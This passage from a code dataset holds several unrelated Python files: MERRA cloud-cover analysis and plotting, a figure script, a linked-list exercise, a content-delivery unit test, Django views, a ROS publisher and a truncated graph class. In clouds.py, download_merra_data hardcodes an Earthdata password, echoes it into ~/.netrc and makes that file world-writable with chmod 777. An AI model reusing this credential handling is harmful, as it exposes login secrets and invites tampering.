time_utils.Time(d, time_middle.ref)\n clouds.append(Clouds(t))\n \n self.cloud = np.concatenate([c.cloud for c in clouds], axis=0)\n self.times = np.concatenate([c.times for c in clouds])\n \n \n def __call__(self, time):\n \"\"\"\n Equivalent Function to the call method\n for Clouds. Interpolates cloud fields to\n the specified time\n \"\"\"\n if time.datetime < self.obs_start.datetime or time.datetime > self.obs_end.datetime:\n raise ValueError(\"Specified time is outside the observation period\")\n else:\n for k in range(len(self.times)-1):\n if self.times[k].datetime < time.datetime <= self.times[k+1].datetime:\n lower = k\n upper = k+1\n \n tlower = 0\n tupper = self.times[upper] - self.times[lower]\n t = time - self.times[lower]\n \n wlower = (t - tupper)/(tlower-tupper)\n wupper = (t - tlower)/(tupper-tlower)\n \n cld = wlower*self.cloud[lower,:,:] + wupper*self.cloud[upper,:,:]\n \n return cld\n \n def show_clouds_ortho(self, time, center, map_bkgd='bluemarble', out='show'):\n \"\"\"\n Equivalent function to the show function\n in Clouds. provide a map of the cloud fields\n at the specified time\n \"\"\"\n def col(x):\n \n c = 1. 
- 0.3*x**2.\n            \n            if x < 0.1:\n                return (c,c,c,0)\n            elif x > 0.8:\n                return (c,c,c,1.)\n            else:\n                return (c,c,c,np.clip((x - 0.1)/0.7, 0., 1.)**2.)\n        \n        \n        \n        projection = Basemap(projection='ortho', lat_0=center[0], lon_0=center[1], resolution='l')\n        \n        if map_bkgd == 'bluemarble':\n            projection.bluemarble(zorder=1)\n        elif map_bkgd == 'etopo':\n            projection.etopo(zorder=1)\n        elif map_bkgd == 'mask':\n            projection.drawlsmask(land_color='limegreen', ocean_color='dodgerblue', resolution='l', zorder=1)\n        else:\n            raise ValueError('invalid map background specification')\n        projection.drawcoastlines(linewidth=0.75, zorder=3)\n        projection.drawcountries(linewidth=0.5, zorder=3)\n        projection.drawmeridians(np.arange(-180, 181, 30), latmax=90, linewidth=0.5, zorder=3)\n        projection.drawparallels(np.arange(-90, 91, 15), latmax=90, linewidth=0.5, zorder=3)\n        \n        cf = self(time)\n        \n        lats = np.arange(-90., 90.25, 0.5)\n        lons = np.arange(-180., 180.3125, 0.625)\n        lons, lats = np.meshgrid(lons, lats)\n        \n\n        levs = np.linspace(0,1,256, endpoint=True)\n        clevs = [col(x) for x in levs]\n        \n        \n        x,y = projection(lons, lats)\n        \n        cfmask = np.ma.masked_greater(x, 1e15).mask\n        cfmasked = np.ma.array(cf, mask=cfmask)\n        \n        plt.contourf(x, y, cfmasked, levs, colors=clevs, extend='both', zorder=2)\n        \n        if out == 'show':\n            plt.show()\n        elif out == '':\n            pass\n        else:\n            plt.savefig(out)\n        \n        \ndef monthly_cloudiness(year, month, centre, cld_threshold=0.05, out='show', data_type='avg per day'):\n    \"\"\"\n    Method to show how cloudy different regions are\n    over the course of a month. This is shown by an\n    average number of cloud free hours per day. \n    \n    This code is largely a replica of Dan's code to\n    do the same process, but this will likely run \n    much faster. \n    \n    args:\n    \n    year - int. year which the data will be shown\n           for.\n    \n    month - int. month which the data will be shown\n            for\n    \n    centre - tuple of (lat,lon) indicating the centre\n             of the orthographic projection onto which\n             values will be plotted\n    \n    cld_threshold - maximum cloud fraction for a grid\n                    square to be considered cloud-free\n    \n    out - string to indicate what kind of output\n          to provide\n    \n    data_type - what kind of data to provide. 'daylight fraction'\n                will give the fraction of daylight hours that\n                are cloud free, and 'avg per day' will give the\n                average number of cloud free daylight hours per day\n    \"\"\"\n    \n    def sun_rise_set(date, latitude):\n        \"\"\"\n        Determine the sunrise and sunset times,\n        given a date and latitude\n        \n        https://en.wikipedia.org/wiki/Sunrise_equation\n        \n        args:\n        \n        date - dt.date instance of the day of the year\n        \n        latitude - array of latitudes to get the sun\n                   rise and sun set times\n        \"\"\"\n        j = int(date.strftime('%j'))\n        \n        \n        solar_dec = 23.45*np.sin(2.*np.pi*((284.+j)/365.))\n        A = -1.*np.tan(np.radians(latitude))*np.tan(np.radians(solar_dec))\n        \n        half_day_length = np.zeros(A.size, dtype=np.float64)\n        \n        interval = np.ma.masked_inside(A, -1., 1.).mask\n        \n        \n        half_day_length[A < -1.] = 12.\n        half_day_length[interval] = np.degrees(np.arccos(A[interval]))/15.\n        \n        rise = 12. - half_day_length\n        set = 12. 
+ half_day_length\n \n return (rise, set, A)\n \n \n filepath = \"/wrk8/MERRA/goldsmr5.gesdisc.eosdis.nasa.gov/%Y/%m/MERRA2_400.tavg3_3d_asm_Nv.%Y%m%d.nc4\"\n \n # construct a range of dates for the month\n d0 = dt.datetime(year, month, 1)\n d1 = dt.datetime(year+1, 1, 1) if month == 12 else dt.datetime(year, month+1, 1)\n date_range = time_utils.Time.arange(d0, d1, dt.timedelta(days=1))\n \n total_cloud_free = np.zeros((361, 577))\n total_daylight = np.zeros((361,577))\n \n for d in date_range:\n \n print(d)\n \n \n # load in the MERRA data for the day\n try: \n merra = Dataset(d.strftime(filepath), \"r\")\n \n except IOError:\n raise IOError('specified MERRA file %s does not exist' % d.strftime(filepath))\n \n \n clear_daylight = np.zeros((8,361,577))\n \n # get all the needed data\n lat = merra['lat'][...]\n lon = merra['lon'][...]\n cld = merra['CLOUD'][...]\n time = merra['time'][...]\n \n \n cld_first_column = cld[...,:1]\n cld = np.append(cld, cld_first_column, axis=-1)\n \n lon = np.append(lon, lon[-1] + 0.625)\n \n sunrise, sunset, _ = sun_rise_set(d, lat)\n \n cld_clear = np.sum(cld < cld_threshold, axis=1) == 72\n \n time_hours = (time + 90.) / 60.\n local_offset = (24./360.)*lon\n \n time_start = (time_hours[:,np.newaxis]*np.ones((1,lat.size)))[...,np.newaxis] + local_offset[np.newaxis,np.newaxis,:]\n time_finish = time_start + 3.\n \n time_start[time_start < 0.] += 24.\n time_start[time_start > 24.] -= 24.\n time_finish[time_finish < 0.] += 24.\n time_finish[time_finish > 24.] -= 24.\n \n \n sunrise = sunrise[np.newaxis,:,np.newaxis]*np.ones((time.size,1,lon.size))\n sunset = sunset[np.newaxis,:,np.newaxis]*np.ones((time.size,1,lon.size))\n \n before_sunrise = time_start <= sunrise\n after_sunrise = time_start > sunrise\n \n before_sunset = time_finish <= sunset\n after_sunset = time_finish > sunset\n \n within_interval = cld_clear*before_sunrise*after_sunset\n add_time = sunset[within_interval] - sunrise[within_interval]\n add_time[add_time < 0.] = 0.\n clear_daylight[within_interval] = add_time\n \n starts_in_interval = cld_clear*before_sunrise*before_sunset\n add_time = time_finish[starts_in_interval] - sunrise[starts_in_interval]\n add_time[add_time < 0.] = 0.\n clear_daylight[starts_in_interval] = add_time\n \n ends_in_interval = cld_clear*after_sunset*after_sunrise\n add_time = sunset[ends_in_interval] - time_start[ends_in_interval]\n add_time[add_time < 0.] = 0.\n clear_daylight[ends_in_interval] = add_time\n \n full_interval = cld_clear*after_sunrise*before_sunset\n add_time = time_finish[full_interval] - time_start[full_interval]\n add_time[add_time < 0.] = 0.\n clear_daylight[full_interval] = add_time \n \n clear_daylight_daily = np.sum(clear_daylight, axis=0)\n daylight_daily = sunset[0] - sunrise[0]\n \n total_cloud_free += clear_daylight_daily\n total_daylight += daylight_daily\n \n merra.close()\n \n \n lon_grid, lat_grid = np.meshgrid(lon, lat)\n \n projection = Basemap(projection='robin', lat_0=centre[0], lon_0=centre[1], resolution='l')\n \n projection.drawcoastlines()\n projection.drawcountries()\n\n \n x, y = projection(lon_grid, lat_grid)\n \n cmask = np.ma.masked_greater(x, 1e15).mask\n cmasked = np.ma.array(total_cloud_free, mask=cmask)\n \n if data_type == 'daylight fraction':\n \n daylight_filled = np.ma.masked_values(total_daylight, 0.).filled(1.) \n fraction = cmasked / daylight_filled\n \n vmin = 0.\n vmax = 1. 
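A quick standalone check of the sunrise-equation logic in sun_rise_set() above (hypothetical inputs, not part of the original file): at the equator tan(lat) = 0, so A = 0, the half-day length is arccos(0)/15 = 6 h, and sunrise/sunset land at 06:00/18:00 local solar time for any declination.

import numpy as np

j = 172  # day of year, near the June solstice (illustrative value)
solar_dec = 23.45*np.sin(2.*np.pi*((284.+j)/365.))
lat = np.array([0., 45.])
A = -1.*np.tan(np.radians(lat))*np.tan(np.radians(solar_dec))
half_day = np.degrees(np.arccos(A))/15.  # hours, valid while -1 < A < 1
print(12. - half_day)  # sunrise: roughly [6.0, 4.3]
print(12. + half_day)  # sunset:  roughly [18.0, 19.7]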
\n \n sm = ScalarMappable(Normalize(vmin=vmin, vmax=vmax), cmap='nipy_spectral_r')\n levs = np.linspace(vmin, vmax, 256)\n clevs = [sm.to_rgba(lev) for lev in levs]\n \n elif data_type == 'avg per day':\n total_hours = len(date_range)\n fraction = cmasked / total_hours\n \n vmin = 0.\n vmax = 12. \n \n sm = ScalarMappable(Normalize(vmin=vmin, vmax=vmax), cmap='nipy_spectral_r')\n levs = np.linspace(vmin, vmax, 256)\n clevs = [sm.to_rgba(lev) for lev in levs]\n \n else:\n raise ValueError\n \n \n ctr = plt.contourf(x, y, fraction, levs, colors=clevs, extend='both')\n \n \n cbar = plt.colorbar(ctr, orientation='vertical', aspect=25, fraction=0.1, shrink = 0.625)\n cbar.set_ticks(np.linspace(vmin, vmax, 11))\n \n if data_type == 'daylight fraction':\n cbar.set_label(d0.strftime('Fraction of Cloud-Free Daylight for %B %Y'))\n elif data_type == 'avg per day':\n \n cbar.set_ticks(np.arange(0, 13, 2))\n \n if out == 'show':\n plt.show()\n elif out == '':\n pass\n else:\n plt.savefig(os.path.join('../figures/cloud_free_daylight_maps/', out), dpi=240)\n plt.close()\n \n\n \ndef animate(centre, start_time, end_time, map_bkgd='bluemarble'):\n \"\"\"\n Create an animation of cloud fields maps\n for each of the timesteps within a \n CloudCollection instance.\n \n args:\n \n centre - tuple of (lat,lon) indicating the centre\n of the orthographic projection.\n \n start_time - dt.datetime or time_utils.Time instance\n of the start time of the interval\n \n end_time - dt.datetime or time_utils.Time instance\n of the end time of the interval\n \n map_bkgd - string indicating what kind of background\n to use.\n \"\"\"\n \n if isinstance(start_time, dt.datetime):\n t1 = time_utils.Time(start_time, start_time)\n else:\n t1 = start_time\n \n if isinstance(end_time, dt.datetime):\n t2 = time_utils.Time(end_time, t1.ref)\n else:\n t2 = end_time.change_ref(t1.ref)\n \n # find the midpoint and length of the time interval\n delta = t2 - t1\n midpoint = t1 + 0.5*delta\n \n # initialize cloud fields\n cld = CloudCollection(midpoint, delta)\n \n # create a temporary directory to store the\n # images that will make up the video\n os.system('mkdir ../figures/animation_temp')\n \n # Draw cloud map for each time step in the CloudCollection,\n # saving each one as a separate image\n for k,t in enumerate(cld.times):\n try:\n print(t.datetime)\n cld.show_clouds_ortho(t, centre, out='', map_bkgd=map_bkgd)\n \n plt.title(t.strftime('%d %b %Y %H:%M:%S'))\n \n plt.savefig('../figures/animation_temp/cloud{:03}.png'.format(k))\n plt.close()\n except ValueError:\n pass\n \n # create the video, and then delete the individual images\n # and the temporary folder \n os.system('mencoder -o ../figures/clouds_{0}_{1}.avi mf://../figures/animation_temp/cloud*.png -ovc lavc -lavcopts vcodec=msmpeg4v2 -mf fps=2'.format(t1.strftime('%y%m%d'), t2.strftime('%y%m%d'))) \n os.system('rm ../figures/animation_temp/*.png')\n os.system('rmdir ../figures/animation_temp') \n \n \ndef download_merra_data(year, month):\n '''\n Notes:\n This function was created using these instructions from NASA:\n https://disc.gsfc.nasa.gov/data-access#mac_linux_wget\n Also note that MERRA data is only published for up to about 2 months ago\n (from whever you're reading this,\n e.g. 
I only have data up to July and it's mid-September).\n If you try to get data from the future none will download\n (nothing will crash though).\n Inputs:\n year (string): the year you want to download\n month (string): the month you want to download\n No outputs, just saves the MERRA data to wherever you tell it to go.\n '''\n print(\"Downloading MERRA Data for\", year, month)\n print(\"this will take approximately forever\")\n user = \"CallumMcCracken\" # input(\"Enter earthdata.nasa.gov username: \")\n password = \"ThisIsMyV3ryStrongPassword\" # input(\"Enter password: \")\n cwd = os.getcwd() # so we can get back here at the end\n os.chdir(os.path.expanduser(\"~\"))\n if not os.path.exists(\".netrc\"):\n os.system(\"touch .netrc\")\n os.system('echo \"machine urs.earthdata.nasa.gov '\n + 'login {} '.format(user)\n + 'password {}\" >> .netrc'.format(password))\n os.system('chmod 777 .netrc') # so future people can edit\n os.system('touch .urs_cookies')\n \n # (this will take a bit of an eternity to run)\n os.chdir(merra_dir)\n wget_format = \"https://goldsmr5.gesdisc.eosdis.nasa.gov/opendap/MERRA2/M2T3NVASM.5.12.4/{year}/{month:02}/MERRA2_400.tavg3_3d_asm_Nv.{year}{month:02}{day:02}.nc4.nc?CLOUD[0:7][0:71][0:360][0:575],lat[0:360],time[0:7],lon[0:575],lev\"\n for day in range(1, monthrange(year, month)[1]+1):\n print(\"working on day\", day)\n os.system(\"wget --load-cookies ~/.urs_cookies \"\n \"--save-cookies ~/.urs_cookies \"\n \"--keep-session-cookies \"\n \"--cut-dirs 3 \"\n \"-r -c -nH -nd -np \"\n \"-A MERRA2_400.tavg3_3d_asm_Nv.{year}{month:02}{day:02}* \".format(year=year, month=month, day=day) +\n \"--content-disposition \" +\n wget_format.format(year=year, month=month, day=day))\n print(\"done day\", day)\n\n for fname in os.listdir():\n # rename all .nc4.nc files as just .nc4, plus move them\n if fname.endswith(\"nc4.nc\"):\n new_filename = fname[:-3]\n new_dir = join(\"{}\".format(year), \"{:02}\".format(month))\n if not exists(new_dir):\n os.mkdir(new_dir)\n os.system(\"mv \"+fname+\" \"+join(new_dir, new_filename))\n # remove wget logs\n if \"wget-log\" in fname:\n os.remove(fname)\n\n # at the end return us to the cwd\n os.chdir(cwd)\n\n \nif __name__ == '__main__':\n dtime = dt.datetime(2015,10,23)\n time = time_utils.Time(dtime,dtime)\n clouds = Clouds(time).show_clouds_ortho(time, (0,0), map_bkgd='mask') \n","sub_path":"modules/earth_data/clouds.py","file_name":"clouds.py","file_ext":"py","file_size_in_byte":27211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"316367499","text":"\nimport os\nfrom math import pi\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport bayesik as bik\n\n\n\n\nnlinks = 2\nfnameNPZ = os.path.join( bik.dirREPO, 'Data', f'links{nlinks}.npz')\nscale = [1000, 1000] + [180/pi]*nlinks\nwith np.load(fnameNPZ) as Z:\n\tQ = scale * Z['Q']\n\tQB = scale * Z['QB']\n\tQLS = scale * Z['QLS']\nEB0,ELS0 = QB - Q, QLS - Q\n\n\n\n\nplt.close('all')\nfig,AX = plt.subplots( 2, 2, figsize=(6,4) )\nfontname = u'Times New Roman'\n\nc0,a0,ec0 = 'k', 1, '0.7'\ncB,aB,ecB = 'b', 0.7, '0'\n\n### posture model errors:\nrangesLS = [(-4,4), (-4,4), (-2,2), (-2,2)]\nrangesB = rangesLS\nfor i,ax in enumerate(AX.ravel()):\n\tax.hist(ELS0[:,i], bins=21, range=rangesLS[i], color=c0, ec=ec0, alpha=a0, zorder=-1, label='Least-squares')\n\tax.hist(EB0[:,i], bins=21, range=rangesB[i], color=cB, ec=ecB, alpha=aB, label='Bayesian')\n\tif i==0:\n\t\tleg = ax.legend(loc='upper right', 
bbox_to_anchor=(1.1,1))\n\t\tplt.setp(leg.get_texts(), size=8, name=fontname)\n\n\n### label axes:\n[ax.set_ylabel('Frequency', name=fontname, size=14) for ax in AX[:,0]]\nlabels = [r'$r_x$ $\\textrm{error (mm)}$', r'$r_y$ $\\textrm{error (mm)}$', r'$\\phi_1$ $\\textrm{error (mm)}$', r'$\\phi_2$ $\\textrm{error (mm)}$']\n[ax.set_xlabel(s, size=14, usetex=True, name=fontname) for ax,s in zip(AX.ravel(),labels)]\n[plt.setp(ax.get_xticklabels() + ax.get_yticklabels(), name=fontname, size=9) for ax in AX.ravel()]\n\n\nplt.tight_layout()\nplt.show()\n\n\n# plt.savefig( os.path.join( bik.dirREPO, 'Appendix', 'ipynb', 'figs', f'error-{nlinks}-link.png') )\n\n\n\n","sub_path":"Python/figE1.py","file_name":"figE1.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"549940846","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def _connect(self, c, L, carry):\n while L is not None:\n val = ( L.val + carry ) % 10\n carry = ( L.val + carry ) // 10\n L.val = val\n c.next = L\n c = c.next\n L = L.next\n if carry == 1:\n c.next = ListNode(1)\n\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n carry = 0\n head = ListNode(0)\n curr = head\n while l1 is not None or l2 is not None:\n if l1 is None:\n self._connect (curr, l2, carry)\n return head.next\n if l2 is None:\n self._connect (curr, l1, carry)\n return head.next\n\n val = (l1.val + l2.val + carry) % 10\n carry = (l1.val + l2.val + carry) // 10\n tmp = ListNode(val)\n curr.next = tmp\n curr = curr.next\n l1 = l1.next\n l2 = l2.next\n if carry == 1:\n curr.next = ListNode(1)\n return head.next\n\n\n\n\n\nsol = Solution()\ndef createList(L):\n head = ListNode(0)\n curr = head\n for i in L:\n tmp = ListNode(i)\n curr.next = tmp\n curr = curr.next\n # printList (head.next)\n return head.next\ndef printList(L):\n while L is not None:\n print (L.val, end=' ')\n L = L.next\n print(\"\\n\")\nprint(\"L1\")\nL1 = createList([9,9])\nprint(\"L2\")\nL2 = createList([1])\nresult = sol.addTwoNumbers(L1, L2)\nprintList(result)\n","sub_path":"2018_google/002_sol.py","file_name":"002_sol.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"650025799","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.2 (3180)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/__unit_test__/ally/cdm/impl/local_filesystem.py\n# Compiled at: 2013-10-02 09:54:40\n\"\"\"\nCreated on Jan 9, 2012\n\n@package support - cdm\n@copyright 2012 Sourcefabric o.p.s.\n@license http: // www.gnu.org / licenses / gpl - 3.0.txt\n@author: Mugur Rus\n\nProvides unit testing for the local filesystem module.\n\"\"\"\nimport package_extender\npackage_extender.PACKAGE_EXTENDER.setForUnitTest(True)\nfrom ally.cdm.impl.local_filesystem import HTTPDelivery, LocalFileSystemCDM, LocalFileSystemLinkCDM\nfrom ally.cdm.spec import PathNotFound\nfrom ally.zip.util_zip import normOSPath\nfrom datetime import datetime\nfrom io import BytesIO\nfrom os import makedirs, remove, sep, stat\nfrom os.path import join, dirname, isfile, isdir\nfrom shutil import rmtree\nfrom tempfile import NamedTemporaryFile, TemporaryDirectory\nimport json, re, unittest\nnormpath = lambda txt: 
re.sub('[\\\\W]+', '', txt)\n\nclass TestHTTPDelivery(unittest.TestCase):\n\n def testHTTPDelivery(self):\n d = HTTPDelivery()\n d.serverURI = 'http://localhost:8080/content/'\n self.assertEqual(d.getURI('somedir/somefile.jpg'), 'http://localhost:8080/content/somedir/somefile.jpg', 'Computing the URI')\n\n def testLocalFilesystemCDM(self):\n d = HTTPDelivery()\n rootDir = TemporaryDirectory()\n d.serverURI = 'http://localhost/content/'\n d.repositoryPath = rootDir.name\n cdm = LocalFileSystemCDM()\n cdm.delivery = d\n try:\n srcTmpFile = NamedTemporaryFile(delete=False)\n srcTmpFile.close()\n dstPath = 'testdir1/tempfile.txt'\n cdm.publishFromFile(dstPath, srcTmpFile.name)\n dstFilePath = join(d.getRepositoryPath(), normOSPath(dstPath))\n self.assertTrue(isfile(dstFilePath))\n self.assertEqual(datetime.fromtimestamp(stat(dstFilePath).st_mtime), cdm.getTimestamp(dstPath))\n finally:\n rmtree(dirname(dstFilePath))\n remove(srcTmpFile.name)\n\n try:\n inFileName = join('dir1', 'subdir2', 'file1.txt')\n dstPath = join('testdir2', 'tempfile2.txt')\n cdm.publishFromFile(dstPath, join(dirname(__file__), 'test.zip', inFileName))\n dstFilePath = join(d.getRepositoryPath(), normOSPath(dstPath))\n self.assertTrue(isfile(dstFilePath))\n finally:\n rmtree(dirname(dstFilePath))\n\n srcTmpDir = TemporaryDirectory()\n dirs = ('test1/subdir1', 'test2/subdir1')\n for dir in dirs:\n fullPath = join(srcTmpDir.name, dir)\n makedirs(fullPath)\n with open(join(fullPath, 'text.html'), 'w') as (_f):\n pass\n\n try:\n cdm.publishFromDir('testdir3', srcTmpDir.name)\n dstDirPath = join(d.getRepositoryPath(), 'testdir3')\n for dir in dirs:\n dstFilePath = join(dstDirPath, dir, 'text.html')\n self.assertTrue(isfile(dstFilePath))\n self.assertEqual(datetime.fromtimestamp(stat(dstFilePath).st_mtime), cdm.getTimestamp(join('testdir3', dir, 'text.html')))\n\n filePath = 'testdir3/test1/subdir1/text.html'\n self.assertTrue(isfile(join(d.getRepositoryPath(), filePath)))\n cdm.republish(filePath, filePath + '.new')\n self.assertTrue(isfile(join(d.getRepositoryPath(), filePath + '.new')))\n cdm.republish(filePath + '.new', filePath)\n cdm.remove(filePath)\n self.assertFalse(isfile(join(d.getRepositoryPath(), filePath)))\n dirPath = 'testdir3/test2'\n self.assertTrue(isdir(join(d.getRepositoryPath(), dirPath)))\n cdm.remove(dirPath)\n self.assertFalse(isdir(join(d.getRepositoryPath(), dirPath)))\n finally:\n rmtree(dstDirPath)\n\n try:\n cdm.publishFromDir('testdir4', join(dirname(__file__), 'test.zip', 'dir1'))\n dstDirPath = join(d.getRepositoryPath(), 'testdir4')\n dstFilePath = join(dstDirPath, 'subdir1', 'file1.txt')\n self.assertTrue(isfile(dstFilePath))\n dstFilePath = join(dstDirPath, 'subdir2', 'file2.txt')\n self.assertTrue(isfile(dstFilePath))\n dstFilePath = join(dstDirPath, 'sometestfile.txt')\n with open(dstFilePath, 'w') as (_f):\n pass\n cdm.publishFromDir('testdir4', join(dirname(__file__), 'test.zip', 'dir1'))\n self.assertTrue(isfile(dstFilePath))\n finally:\n rmtree(dstDirPath)\n\n try:\n path = join('testdir5', 'somecontent.txt')\n cdm.publishContent(path, BytesIO(b'test'))\n dstFilePath = join(d.getRepositoryPath(), path)\n self.assertTrue(isfile(dstFilePath))\n finally:\n rmtree(join(d.getRepositoryPath(), dirname(path)))\n\n try:\n path = join('testdir6', 'somecontent2.txt')\n cdm.publishFromFile(path, BytesIO(b'test 2'))\n dstFilePath = join(d.getRepositoryPath(), path)\n self.assertTrue(isfile(dstFilePath))\n finally:\n rmtree(join(d.getRepositoryPath(), dirname(path)))\n\n def 
testLocalFileSystemLinkCDM(self):\n d = HTTPDelivery()\n rootDir = TemporaryDirectory()\n d.serverURI = 'http://localhost/content/'\n d.repositoryPath = rootDir.name\n cdm = LocalFileSystemLinkCDM()\n cdm.delivery = d\n try:\n exceptionRaised = False\n cdm.publishFromFile('a/../../b', 'somefile.txt')\n except PathNotFound:\n exceptionRaised = True\n\n self.assertTrue(exceptionRaised, 'No exception was raised on out of repository path')\n try:\n srcTmpFile = NamedTemporaryFile()\n dstFile = join('testdir7', 'tempfile.txt')\n cdm.publishFromFile(dstFile, srcTmpFile.name)\n dstLinkPath = join(d.getRepositoryPath(), dstFile + cdm._linkExt)\n self.assertTrue(isfile(dstLinkPath))\n with open(dstLinkPath) as (f):\n links = json.load(f)\n self.assertIsInstance(links, list)\n self.assertEqual(links[0][0], 'FS')\n self.assertEqual(srcTmpFile.name, links[0][1])\n self.assertEqual(datetime.fromtimestamp(stat(srcTmpFile.name).st_mtime), cdm.getTimestamp('testdir7/tempfile.txt'))\n finally:\n rmtree(dirname(dstLinkPath))\n\n try:\n dstFile = join('testdir8', 'tempfile2.txt')\n inFileName = join('dir1', 'subdir2', 'file1.txt')\n srcFilePath = join(dirname(__file__), 'test.zip', inFileName)\n cdm.publishFromFile(dstFile, srcFilePath)\n dstLinkPath = join(d.getRepositoryPath(), dstFile + cdm._linkExt)\n self.assertTrue(isfile(dstLinkPath))\n with open(dstLinkPath) as (f):\n links = json.load(f)\n self.assertEqual(links[0][0], 'ZIP')\n zipPath = links[0][1]\n inPath = normOSPath(links[0][2], True)\n linkPath = join(zipPath, inPath)\n self.assertEqual(normpath(linkPath), normpath(srcFilePath))\n self.assertEqual(datetime.fromtimestamp(stat(join(dirname(__file__), 'test.zip')).st_mtime), cdm.getTimestamp('testdir8/tempfile2.txt'))\n finally:\n rmtree(dirname(dstLinkPath))\n\n srcTmpDir = TemporaryDirectory()\n dirs = (join(srcTmpDir.name, 'test1/subdir1'), join(srcTmpDir.name, 'test2/subdir1'))\n for dir in dirs:\n makedirs(dir)\n with open(join(dir, 'text.html'), 'w+') as (_f):\n pass\n\n try:\n cdm.publishFromDir('testlink1', srcTmpDir.name)\n dstLinkPath = join(d.getRepositoryPath(), 'testlink1' + cdm._linkExt)\n self.assertTrue(isfile(dstLinkPath))\n with open(dstLinkPath) as (f):\n links = json.load(f)\n self.assertEqual(links[0][0], 'FS')\n self.assertEqual(srcTmpDir.name, links[0][1])\n self.assertEqual(datetime.fromtimestamp(stat(join(srcTmpDir.name, 'test1/subdir1/text.html')).st_mtime), cdm.getTimestamp('testlink1/test1/subdir1/text.html'))\n delPath1 = 'testlink1/test1/subdir1/text.html'\n cdm.remove(delPath1)\n self.assertTrue(isfile(join(d.getRepositoryPath(), delPath1 + '.deleted')))\n delPath2 = 'testlink1/test1'\n cdm.remove(delPath2)\n self.assertTrue(isfile(join(d.getRepositoryPath(), delPath2 + '.deleted')))\n finally:\n rmtree(join(d.getRepositoryPath(), 'testlink1'))\n remove(dstLinkPath)\n\n try:\n srcFilePath = join(dirname(__file__), 'test.zip', 'dir1') + sep\n cdm.publishFromFile('testlink2', srcFilePath)\n dstLinkPath = join(d.getRepositoryPath(), 'testlink2' + cdm._linkExt)\n self.assertTrue(isfile(dstLinkPath))\n with open(dstLinkPath) as (f):\n links = json.load(f)\n self.assertEqual(links[0][0], 'ZIP')\n zipPath = links[0][1]\n inPath = normOSPath(links[0][2], True)\n link = join(zipPath, inPath)\n self.assertEqual(link, srcFilePath)\n self.assertEqual(datetime.fromtimestamp(stat(join(dirname(__file__), 'test.zip')).st_mtime), cdm.getTimestamp('testlink2/subdir1/file1.txt'))\n delPath1 = 'testlink2/subdir1/file1.txt'\n cdm.remove(delPath1)\n 
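The assertions in this test pin down the on-disk format of the *.link metadata files: a JSON list of link entries, either ['FS', source_path] for filesystem links or ['ZIP', zip_path, inner_path] for links into archives. A minimal illustration with made-up paths (not taken from the test fixtures):

import json

sample = '[["ZIP", "/tmp/test.zip", "dir1/"], ["FS", "/tmp/plain.txt"]]'
links = json.loads(sample)
for kind, *paths in links:
    # prints: ZIP ['/tmp/test.zip', 'dir1/'] then FS ['/tmp/plain.txt']
    print(kind, paths)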
self.assertTrue(isfile(join(d.getRepositoryPath(), delPath1 + '.deleted')))\n            delPath2 = 'testlink2/subdir1/'\n            self.assertTrue(isdir(join(d.getRepositoryPath(), delPath2)))\n            cdm.remove(delPath2)\n            self.assertTrue(isfile(join(d.getRepositoryPath(), delPath2.rstrip('/') + '.deleted')))\n            self.assertFalse(isdir(join(d.getRepositoryPath(), delPath2)))\n            self.assertFalse(isfile(join(d.getRepositoryPath(), delPath1 + '.deleted')))\n        finally:\n            rmtree(join(d.getRepositoryPath(), 'testlink2'))\n            remove(dstLinkPath)\n\n\nif __name__ == '__main__':\n    unittest.main()","sub_path":"pycfiles/ally_py-0.9.0-py3.2/local_filesystem.cpython-32.py","file_name":"local_filesystem.cpython-32.py","file_ext":"py","file_size_in_byte":10318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"601947139","text":"__author__ = 'jason.parent@carneylabs.com (Jason Parent)'\n\n# Django imports...\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\n\n# Local imports...\nfrom .forms import ProfileForm\n\n\n@login_required\ndef profile_view(request):\n    return render(request, 'accounts/profile.html')\n\n\n@login_required\ndef profile_edit_view(request):\n    form = ProfileForm(instance=request.user)\n\n    if request.method == 'POST':\n        form = ProfileForm(instance=request.user, data=request.POST, files=request.FILES)\n\n        if form.is_valid():\n            form.save()\n\n            return redirect(reverse('profile'))\n\n    return render(request, 'accounts/profile_edit.html', {\n        'form': form\n    })","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"489507881","text":"#!/usr/bin/env python\n\n\nimport rospy\nfrom tf_sim.msg import Float32Stamped\n\ndef step_gen():\n\n    pub = rospy.Publisher('input_val', Float32Stamped, queue_size=10)\n\n    rospy.init_node('step_sim')\n\n    mg = rospy.get_param('~magnitude', 60)\n    freq = rospy.get_param('~frequency', 10)\n\n\n    rospy.loginfo('Simulating step of magnitude %d', mg)\n\n    rate = rospy.Rate(freq)\n\n    msg = Float32Stamped()\n\n    while not rospy.is_shutdown():\n\n        msg.data = mg\n        msg.header.stamp = rospy.get_rostime()\n\n        pub.publish(msg)\n\n        rate.sleep()\n\nif __name__ == '__main__':\n\n    global mg\n\n    try:\n        step_gen()\n    except rospy.ROSInterruptException:\n        pass\n","sub_path":"Izar Castorina - Entrega 2 PCSE/Parte 2/tf_sim/scripts/step_sim_node.py","file_name":"step_sim_node.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"503722136","text":"\"\"\"\nVNode: vertex\nArcNode: arc\nAdjacency list\n\"\"\"\n\n\nclass ArcNode:\n    def __init__(self, info, vnode=None, nextArcNode=None):\n        self.vnode = 